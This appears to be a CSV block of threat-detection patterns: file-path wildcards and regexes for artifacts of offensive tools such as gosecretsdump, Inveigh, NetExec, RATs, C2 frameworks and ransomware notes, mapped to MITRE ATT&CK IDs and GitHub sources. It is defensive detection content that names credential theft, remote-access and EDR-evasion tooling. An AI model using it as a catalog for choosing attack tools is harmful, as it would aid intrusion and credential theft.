"*\impacket-out\*",".{0,1000}\\impacket\-out\\.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","15891"
"*\Imperium RAT Cracked\*",".{0,1000}\\Imperium\sRAT\sCracked\\.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15892"
"*\Impersonate.exe*",".{0,1000}\\Impersonate\.exe.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","15893"
"*\impersonate.py*",".{0,1000}\\impersonate\.py.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","15894"
"*\impersonate.py*",".{0,1000}\\impersonate\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15895"
"*\Impersonate\Impersonate.cpp*",".{0,1000}\\Impersonate\\Impersonate\.cpp.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","15896"
"*\Implant.exe *",".{0,1000}\\Implant\.exe\s.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","15897"
"*\implant.exe *.exe",".{0,1000}\\implant\.exe\s.{0,1000}\.exe","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","15898"
"*\Implants\powershell.ps1*",".{0,1000}\\Implants\\powershell\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","15899"
"*\ImplantSSP.exe*",".{0,1000}\\ImplantSSP\.exe.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","15900"
"*\ImSecureRat.exe*",".{0,1000}\\ImSecureRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15901"
"*\InactiveDomainAdmins.csv*",".{0,1000}\\InactiveDomainAdmins\.csv.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","15902"
"*\inceptor.py*",".{0,1000}\\inceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","15903"
"*\include\KaynStrike.h*",".{0,1000}\\include\\KaynStrike\.h.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","15904"
"*\include\kerberoast.h*",".{0,1000}\\include\\kerberoast\.h.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","15905"
"*\INC-README.html*",".{0,1000}\\INC\-README\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15906"
"*\INC-README.txt*",".{0,1000}\\INC\-README\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15907"
"*\INC-README2.txt*",".{0,1000}\\INC\-README2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15908"
"*\INC-README3.txt*",".{0,1000}\\INC\-README3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15909"
"*\INC-README4.txt*",".{0,1000}\\INC\-README4\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15910"
"*\InflativeLoading.py*",".{0,1000}\\InflativeLoading\.py.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","15911"
"*\InflativeLoading\bin\*.bin*",".{0,1000}\\InflativeLoading\\bin\\.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","15912"
"*\InflativeLoading\bin\*.exe*",".{0,1000}\\InflativeLoading\\bin\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","15913"
"*\InflativeLoading-main.zip*",".{0,1000}\\InflativeLoading\-main\.zip.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","15914"
"*\InfoGrab.dll*",".{0,1000}\\InfoGrab\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","15915"
"*\inject_shellcode.py*",".{0,1000}\\inject_shellcode\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","15916"
"*\InjectedDLL.cpp*",".{0,1000}\\InjectedDLL\.cpp.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","15918"
"*\injector.ps1 1 *",".{0,1000}\\injector\.ps1\s1\s.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","N/A","9","4","328","44","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z","15919"
"*\injector.ps1 2 *",".{0,1000}\\injector\.ps1\s2\s.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","N/A","9","4","328","44","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z","15920"
"*\inline-shellcode-test.c*",".{0,1000}\\inline\-shellcode\-test\.c.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","15921"
"*\install_elevated.py*",".{0,1000}\\install_elevated\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15922"
"*\InstallShellcode.exe*",".{0,1000}\\InstallShellcode\.exe.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","15923"
"*\InstallStager.exe*",".{0,1000}\\InstallStager\.exe.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","15924"
"*\InstallStager.pdb*",".{0,1000}\\InstallStager\.pdb.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","15925"
"*\interesting-teamsmessages.csv*",".{0,1000}\\interesting\-teamsmessages\.csv.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","15926"
"*\InternalMonologue.exe*",".{0,1000}\\InternalMonologue\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15927"
"*\InternalMonologue.pdb*",".{0,1000}\\InternalMonologue\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15928"
"*\InternetConnect_x64_Release.exe*",".{0,1000}\\InternetConnect_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15929"
"*\Intranet penetration.cna*",".{0,1000}\\Intranet\spenetration\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15932"
"*\Inveigh.exe*",".{0,1000}\\Inveigh\.exe.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","15933"
"*\Inveigh.exe*",".{0,1000}\\Inveigh\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","15934"
"*\inveigh.exe*",".{0,1000}\\inveigh\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","15935"
"*\inveigh.log*",".{0,1000}\\inveigh\.log.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15936"
"*\inveigh.log*",".{0,1000}\\inveigh\.log.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15937"
"*\Inveigh.ps1*",".{0,1000}\\Inveigh\.ps1.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15938"
"*\Inveigh.ps1*",".{0,1000}\\Inveigh\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15939"
"*\Inveigh.ps1*",".{0,1000}\\Inveigh\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15940"
"*\Inveigh.ps1*",".{0,1000}\\Inveigh\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15941"
"*\Inveigh.psd1*",".{0,1000}\\Inveigh\.psd1.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15942"
"*\Inveigh.psd1*",".{0,1000}\\Inveigh\.psd1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15943"
"*\Inveigh\bin\*",".{0,1000}\\Inveigh\\bin\\.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","15944"
"*\Inveigh-Cleartext.txt*",".{0,1000}\\Inveigh\-Cleartext\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15945"
"*\Inveigh-Cleartext.txt*",".{0,1000}\\Inveigh\-Cleartext\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15946"
"*\Inveigh-FormInput.txt*",".{0,1000}\\Inveigh\-FormInput\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15947"
"*\Inveigh-FormInput.txt*",".{0,1000}\\Inveigh\-FormInput\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15948"
"*\Inveigh-Log.txt*",".{0,1000}\\Inveigh\-Log\.txt.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15949"
"*\Inveigh-Log.txt*",".{0,1000}\\Inveigh\-Log\.txt.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","15950"
